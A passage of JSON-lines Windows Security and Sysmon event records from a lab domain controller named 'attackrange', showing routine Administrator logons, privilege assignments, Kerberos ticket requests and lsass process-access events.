always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x80ade","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{7FF916DC-DFFB-DD6F-2100-4628BF43D695}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220562,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80ADE\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x80ade","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5475,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.806\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.806","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5476,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.806\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.806","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220563,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80ADE\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x80ade","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5477,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.822\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.822","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220564,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220565,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7FF916DC-DFFB-DD6F-2100-4628BF43D695}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7FF916DC-DFFB-DD6F-2100-4628BF43D695}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220566,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7FF916DC-DFFB-DD6F-2100-4628BF43D695}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7FF916DC-DFFB-DD6F-2100-4628BF43D695}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220567,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80B00\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7FF916DC-DFFB-DD6F-2100-4628BF43D695}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x80b00","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{7FF916DC-DFFB-DD6F-2100-4628BF43D695}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220568,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80B00\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x80b00","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5478,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.822\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 